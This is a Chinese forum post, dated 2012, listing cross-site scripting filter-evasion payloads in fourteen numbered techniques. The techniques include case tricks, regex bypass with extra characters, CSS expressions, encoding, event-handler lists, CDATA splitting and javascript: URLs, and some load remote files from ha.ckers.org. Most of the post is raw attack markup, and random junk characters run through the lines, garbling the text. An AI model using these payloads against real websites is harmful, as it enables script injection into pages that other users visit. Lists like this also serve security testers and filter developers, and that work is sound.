1. 改变字符大小写
& p! H( V$ w, h1 T1 o/ j7 `. O- v9 p, L& }8 l/ j4 C
) K* v) {# b, X! |# A
( J, V! [" _6 @% ?: P <sCript>alert(‘d’)</scRipT>
8 w- E4 g. g5 p& N) w% U5 J. A- Q9 V2 C2 d1 T
2. 利用多加一些其它字符来规避Regular Expression的检查
( J" E( K9 M l' @1 a& Y4 y
& v4 i1 |( B1 ~. k: m$ K$ w <<script>alert(‘c’)//<</script>! `1 x T. p& X. \2 @
3 S8 X/ e; ]4 `- N: ?4 g4 c K <SCRIPT a=">" SRC="t.js"></SCRIPT>
: e* Q* k6 b- n) k% K" o& C y8 k
<SCRIPT =">" SRC="t.js"></SCRIPT>2 o2 S- b3 q- h7 h% a, l3 S. D
) C7 c4 Y5 G) K& L4 M <SCRIPT a=">" ” SRC="t.js"></SCRIPT>9 f" S9 u+ e0 t H2 M# i9 C* N# c
' h; J# m% N* |1 j; L% B
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
, \+ L) r. \7 N6 K* U
/ b( _, j$ V _ <SCRIPT a=`>` SRC="t.js"></SCRIPT>
( _1 B& u+ z& r# c% Z
$ k& k9 ~2 t% @ y+ s; X8 g <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
" j, ^+ ], F! r) j1 x' |5 q2 {/ G/ U% [
3. 以其它扩展名取代.js) O2 w9 @8 `+ }$ t" ^
( _# ~8 l i6 F- W+ L' | <script src="bad.jpg"></script>+ C* W0 `) Y8 A1 h- g
. S# L( A& P5 j
4. 将Javascript写在CSS档里4 M, T0 b4 n. w! z. S
3 t; S4 o5 J6 y5 _. U# {& w u <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
3 D `4 c2 `- e' e. U# z% d
" Y; f: q C/ s& j" ? example:3 [; X3 K; K \
9 Z# k* R% [: ~# v) ?' H! I4 Z5 c5 O& f body {$ L) r8 W0 y! {" Q# y N8 i
, u7 U0 |' d# d, P6 U
background-image: url(‘javascript:alert("XSS");’)4 ~1 Y5 J/ Y+ c
+ j1 G' }( s9 ?- R4 J
}
) r. n' E" k {
9 x# P2 g) Y8 h5 C, ~5. 在script的tag里加入一些其它字符, N# ]2 |0 J5 T8 y7 \ i3 L
" S- G$ y7 ?. e8 x) R
<SCRIPT/SRC="t.js"></SCRIPT>
% X; @; d! N+ o2 z! z; r! D7 ?( a s$ ~( X
<SCRIPT/anyword SRC="t.js"></SCRIPT>2 w' x% i% ~8 v" n" c9 ?9 j
) D, H- h- x- q3 H2 O4 i; r6. 使用tab或是new line来规避3 B) q* K2 i$ z! [8 `5 o
: G% k/ t( p9 h, D, Q" Q8 D- Y+ ]
<img src="jav ascr ipt:alert(‘XSS3′)">" y' v" v+ @% q" Z0 l( e
* U$ h! f+ g+ s9 L; R# n
<img src="jav ascr ipt:alert(‘XSS3′)">
7 |. f8 `. j& i! i. ?' `
/ I v# T+ w6 c0 T: q5 ` <IMG SRC="jav ascript:alert(‘XSS’);">
+ }# B# z P# E8 Y0 D! Z P- X0 o- f8 m+ G) g {9 Z
-> tag) ~ o. l. m) N0 E- Q$ L, |
8 h* d/ L& W$ j' E, K5 ~$ e
-> new line
* g$ Z% q5 _+ C# V+ j% g6 l6 Z0 @: N
6 o; S- l+ ]0 ] H) p3 N4 b7 ]7. 使用"\"来规避7 Z- V+ i. p6 T
! W' z' d' t2 Q) S4 w# F5 o
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>5 n' j4 e6 l# A5 G
: i: V+ Q0 g6 C, n! @6 S- ` <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>1 K8 \' N4 d3 [6 z7 R6 B! E
+ B- S" W4 U) ^/ B <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
# W9 Q. ]2 T2 c/ ?: J
, Y) W' C( Q. n, B3 e <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
0 w" A3 x' i V; }5 |& e% C9 U5 W! H+ f; V2 l: F& n
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
m! V- E [) X- O( N2 E- H. l4 j1 G M8 |' |
8. 使用Hex encode来规避(也可能会把";"拿掉)* i7 E0 a2 C" k5 T# L* R
9 {* _8 n5 b# j0 }9 g- z <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
* H5 H5 u# n2 L2 M# D6 h* w5 d& q/ i
D* i3 [' u l/ F/ B1 L 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
& H5 l. V& F( e% D7 l5 T
! ^; x% x" w* k' C3 p: Q+ G' i <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
, X4 d B' P4 J' E N8 f" r1 `/ {9 c$ [
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
% X. g+ b# f- K! U; Q' ~2 }8 r c+ t9 d
9. script in HTML tag
# K% x- K2 e$ Q8 l8 C# p2 G
f* ]; g: }( x5 G8 i. I <body onload=」alert(‘onload’)」>) ^/ Y$ |4 v! T/ H- I
9 c8 g: i/ z4 T' e: M+ ^ onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
1 ?1 N, n6 p5 Z4 e, p" W! ?8 f# }: \2 ?/ f! N
10. 在swf里含有xss的code4 J, G6 u" C; U `4 a: \1 o, L k
i; W" R3 a: c! ?8 D <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>. O# ?4 a# H" }
, z% H. D& L9 g) M1 Q. Y" ^# f11. 利用CDATA将xss的code拆开,再组合起来。" e Z) `7 i; X/ f7 j9 S* z8 l
G$ @+ A, p5 B- Q( u% M; w( z <XML ID=I><X><C>$ R- Q8 [6 C+ l0 p3 m
. o" M/ ~$ p. j. S <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
3 |4 s+ ]( b$ V# x3 t) }* L" _) p6 u ~ Y0 ]& S
</C></X>& B$ g6 _! i% B# H/ i
5 V6 `$ z2 @' G e" I/ Q
</xml>+ R( K* X- Q9 f
0 D' b6 y4 p8 y4 B6 Z0 y5 u' y <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>. [ R1 T7 d8 S8 }( ^# w# l' U
4 d6 ?; K. N5 K9 ?( } <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>4 }# W$ W3 T( w1 ?# C6 D, g" \6 \
9 t$ k) Y0 `/ \& k
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>1 C0 n: n0 f8 d
! p) I$ L5 d( _8 J8 S- M- J/ \
12. 利用HTML+TIME。
3 ?4 b/ h M5 M' t! q! V2 I; g5 W4 H9 @% @1 K* \* R6 B- s: Z
<HTML><BODY>& c9 P0 p4 `. b+ N) N) E* z* b
& y6 E, _& B$ V) \* P, f( x9 c <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
# M% m9 a7 c* |) N+ w2 u! E0 U, t/ S( d( }# M! n
<?import namespace="t" implementation="#default#time2">
E- c7 f7 }0 m% ~, ]. }
5 F4 d8 {: [: `1 l& {9 Y& Z <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">- Y( t3 ?" Y( _# b
& W/ Z# A6 ~( G- G8 i- h3 F
</BODY></HTML>
" `- A+ v; _; }" Q7 w% d# Y6 m9 L: j' b9 p- ^
13. 透过META写入Cookie。0 ^; M& b% G' ]* I. W
- V e5 U6 c5 a( v <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">* o; `. y+ t2 w6 [* C$ c
2 q- h) y) W% a9 j k
14. javascript in src , href , url
" n: N+ U. R# Q3 ?! C# D) b! U1 S. B
% w' g2 q: b: E! f( T1 o5 F <IFRAME SRC=javascript:alert(’13′)></IFRAME>
0 _* Z* L- ~5 c8 `8 Y4 f! L
4 \% V8 X5 l1 A <img src="javascript:alert(‘XSS3′)">
" Y' r* u' \/ m. Q9 h" l8 E2 w, O3 c$ @( ?2 G2 ]$ U! D2 t( w7 d) o
<IMG DYNSRC="javascript:alert(‘XSS20′)">3 u& t% x$ r; [+ m. \$ f3 z% q u
( y9 E. b* Z) k' \. x# n
<IMG LOWSRC="javascript:alert(‘XSS21′)">6 X1 K/ o: \9 M* n3 L$ R$ p
% s+ [$ g q/ _$ F) X
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">& u' m' O" L" A- K5 V0 `/ Y+ h5 ~
/ u7 C9 A2 q% M0 P5 Q/ ^
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
% Y3 N/ |8 ~/ S6 v: e" k
6 J0 ~) n0 D6 b7 Q) }; g' I <TABLE BACKGROUND="javascript:alert(‘XSS29′)">
+ W& W) _5 k2 b2 w, K! J$ X8 Z k3 J, r6 I8 H) U+ D( D' F- n% O
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">" ?1 N2 x7 V+ H: ]* m7 R* P* i4 r: _
5 ~6 y4 i* ^' N5 O <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}( w6 e# v5 Q ~8 u5 Z& A: u
/ z T5 L c5 t |7 i
</STYLE><A CLASS=XSS></A>
, R* h9 Q; ?) h# g5 }" _- {
& T, u, T3 S2 e' l9 h7 m <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
; d+ a" j* t% ?: v1 S9 P0 r( r9 P% e* ~3 _) [- W8 i$ [( g6 `9 A
|
发表于 2012-12-31 09:59:28
收藏
支持
反对